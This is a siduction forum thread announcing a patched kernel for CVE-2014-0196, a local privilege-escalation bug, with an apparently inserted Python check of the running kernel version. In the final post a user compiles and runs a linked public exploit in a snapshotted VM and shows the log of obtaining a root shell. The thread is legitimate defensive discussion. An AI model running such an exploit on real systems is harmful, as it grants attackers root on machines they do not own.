Hello dear siductians!
There is a CVE (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0196) for the recent Linux kernel: a race condition leads to DoS or privilege escalation.
If you want to take action, please do a dist-upgrade or install linux-image-3.14-3.towo.2-siduction-[amd64|686|686-pae] and its headers.
You need to reboot into the new kernel.
Thanks towo` for quickly uploading a patched kernel. Well done!
greetings
musca
[Edit]
Kernel versions not affected:
3.14-3.towo.2
3.14-4
3.15.rc5
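An added check, not part of this post or of siduction's own tooling: after the dist-upgrade and reboot, this small Python script parses the running kernel's release string (the `uname -r` value) and compares it against the unaffected versions listed above. The thresholds come only from that list; the parsing of the siduction naming scheme (`3.14-3.towo.2-siduction-amd64`, with an optional `rcN` and an optional `towo.N` build number) is an assumption based on the names that appear in this thread.

```python
import os
import re
from typing import Optional

# Parses siduction/Debian-style kernel release strings such as
#   3.14-3.towo.2-siduction-amd64   (patched, per the post)
#   3.14-3.towo-siduction-amd64     (unpatched build before .towo.2)
#   3.15-rc5-towo.1-siduction-amd64 (3.15 rc5 is listed as not affected)
# The naming pattern is an assumption derived from the thread.
_RELEASE_RE = re.compile(
    r"^(?P<major>\d+)\.(?P<minor>\d+)"        # upstream version, e.g. 3.14
    r"(?:[-.]rc(?P<rc>\d+))?"                 # optional release candidate
    r"(?:-(?P<abi>\d+))?"                     # Debian ABI revision, e.g. -3
    r"(?:[-.]towo(?:\.(?P<towo>\d+))?)?"      # siduction build, e.g. .towo.2
)


def parse_release(release: str) -> Optional[dict]:
    """Split a kernel release string into its numeric components.

    Returns None when the string does not start with a version number,
    so callers can treat unknown formats as unverified."""
    m = _RELEASE_RE.match(release)
    if m is None:
        return None
    return {k: (int(v) if v is not None else None)
            for k, v in m.groupdict().items()}


def is_patched(release: str) -> bool:
    """True when the release is at or above one of the versions the post
    lists as not affected: 3.14-3.towo.2, 3.14-4, 3.15-rc5.

    Anything that cannot be parsed, or is older than those, is reported
    as unpatched: the safe default for a privilege-escalation bug."""
    v = parse_release(release)
    if v is None:
        return False
    upstream = (v["major"], v["minor"])
    if upstream > (3, 15):
        return True
    if upstream == (3, 15):
        # 3.15 final, or any rc from rc5 on
        return v["rc"] is None or v["rc"] >= 5
    if upstream == (3, 14):
        abi = v["abi"] or 0
        towo = v["towo"] or 0       # ".towo" without a number is build 0
        return abi >= 4 or (abi == 3 and towo >= 2)
    # Older upstream versions are not in the post's fixed list.
    return False


def check_running_kernel() -> tuple:
    """Return (release string, patched?) for the kernel currently booted."""
    release = os.uname().release
    return release, is_patched(release)


if __name__ == "__main__":
    rel, ok = check_running_kernel()
    print(f"running kernel: {rel}")
    print("patched for CVE-2014-0196 (per siduction version list): "
          + ("yes" if ok else "NO, reboot into the new kernel"))
```

Run it after the reboot; if it still reports the old `3.14-3.towo` build, the new kernel was installed but not booted, which is exactly the situation the post warns about.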
@towo: Really very quick to respond to the error in the kernel. Good work!
Thank you Towo.
Fix not available on the uni-stuttgart mirror at the moment; whoever wants to upgrade immediately should use berlin.
Did I understand the bug correctly? This local thing? Isn't update panic a little out of place here, and maybe exaggerated?
Please, don't panic.
Thanks towo, good work.
But melma(r)ker is right, don't panic, it's only locally triggerable, dude ;-)
But it seems it is triggerable if someone gets remote access as a user (via a buggy webserver or the like; see here, German only, sorry: http://www.heise.de/newsticker/meldung/Schwachstelle-im-Linux-Kernel-Admin-Rechte-fuer-alle-2187501.html). Kernels since 2.36.1-rc3 are affected!
Still, the patched kernel is very much appreciated!
(And if you don't find the kernel, it's 686, not i386, at the end of the name.)
Hello,
Only a few attacks knock out security with a simple "remote code execution with root rights" in one step. Many attacks take a two-step approach: first take control of code execution as a user, then gain root privileges.
Now imagine how hackers prepare such attacks: they silently develop their methods to activate their own code and then wait for the opportunity to become root. Not patching a known privilege escalation bug makes it easier for them to attack their target systems.
I think the alert shows our responsiveness and as a result there is no panic.
Doing a dist-upgrade or installing a kernel is just standard procedure.
@michaa7, thanks for the hint, i'll update the name.
greetings
musca
Hello,
I was curious about the sample exploit code (http://bugfuzz.com/stuff/cve-2014-0196-md.c) and tried it.
I created a snapshot of my virtual machine, so I can easily delete the compromised state afterwards.
In the first attempt the virtual machine froze, but in the second attempt:
user@sidubox:~/cve$ gcc cve-2014-0196-md.c -lutil -lpthread
user@sidubox:~/cve$ ./a.out
[+] Resolving symbols
[+] Resolved commit_creds: 0xffffffff8105e5bb
[+] Resolved prepare_kernel_cred: 0xffffffff8105e8af
[+] Doing once-off allocations
[+] Attempting to overflow into a tty_struct....
[+] Got it :)
root@sidubox:~/cve# whoami
root
root@sidubox:~/cve# id
uid=0(root) gid=0(root) Gruppen=0(root)
root@sidubox:~/cve# uname -a
Linux sidubox 3.14-3.towo-siduction-amd64 #1 SMP PREEMPT Tue May 6 20:46:12 UTC 2014 x86_64 GNU/Linux
root@sidubox:~/cve#
It took quite a few seconds.
Now reverting to the clean snapshot.
greetings
musca